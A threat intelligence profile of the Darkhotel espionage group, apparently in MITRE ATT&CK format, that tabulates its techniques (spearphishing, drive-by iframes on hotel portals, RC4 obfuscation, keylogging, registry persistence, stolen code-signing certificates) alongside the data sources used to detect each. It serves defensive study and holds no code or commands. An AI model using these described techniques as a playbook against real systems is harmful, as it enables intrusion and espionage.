Darkhotel is a threat group that has been active since at least 2004. The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks. The actors have also conducted spearphishing. (Citation: Kaspersky Darkhotel)
Platform | Tactic | Technique | Description | Data Sources |
---|---|---|---|---|
Windows, macOS, Linux | initial-access | Spearphishing Attachment | Darkhotel has sent spearphishing emails with malicious RAR attachments. | File monitoring, Packet capture, Network intrusion detection system, Detonation chamber, Email gateway, Mail server |
Linux, macOS, Windows, AWS, GCP, Azure | discovery | System Information Discovery | Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine. | Azure activity logs, Stackdriver logs, AWS CloudTrail logs, Process monitoring, Process command-line parameters |
Linux, Windows, macOS | execution | User Execution | Darkhotel sent spearphishing emails with malicious attachments that required users to click on an image in the document to drop the malware to disk. | Anti-virus, Process command-line parameters, Process monitoring |
Windows | defense-evasion | Deobfuscate/Decode Files or Information | Darkhotel has decrypted strings and imports using RC4 during execution. | File monitoring, Process monitoring, Process command-line parameters |
Windows, Linux, macOS, SaaS | initial-access | Drive-by Compromise | Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware. | Packet capture, Network device logs, Process use of network, Web proxy, Network intrusion detection system, SSL/TLS inspection |
Linux, macOS, Windows | discovery | System Network Configuration Discovery | Darkhotel has collected the IP address and network adapter information from the victim’s machine. | Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion | Obfuscated Files or Information | Darkhotel has obfuscated code used in an operation using RC4 and other methods. | Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering, Binary file metadata, Process command-line parameters, Environment variable, Process monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection |
macOS, Windows | discovery | Security Software Discovery | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system. | File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | discovery | Process Discovery | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system. | Process monitoring, Process command-line parameters |
Windows | persistence | Shortcut Modification | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file. | File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion, execution | Scripting | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file. | Process monitoring, File monitoring, Process command-line parameters |
Windows | lateral-movement, initial-access | Replication Through Removable Media | Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers. | File monitoring, Data loss prevention |
macOS, Windows | defense-evasion | Code Signing | Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them. | Binary file metadata |
Windows | lateral-movement | Taint Shared Content | Darkhotel used a virus that propagates by infecting executables stored on shared drives. | File monitoring, Process monitoring |
Linux, macOS, Windows | collection, credential-access | Input Capture | Darkhotel has used a keylogger. | Windows Registry, Kernel drivers, Process monitoring, API monitoring |
Windows | persistence | Registry Run Keys / Startup Folder | Darkhotel has been known to establish persistence by adding programs to the Run Registry key. | Windows Registry, File monitoring |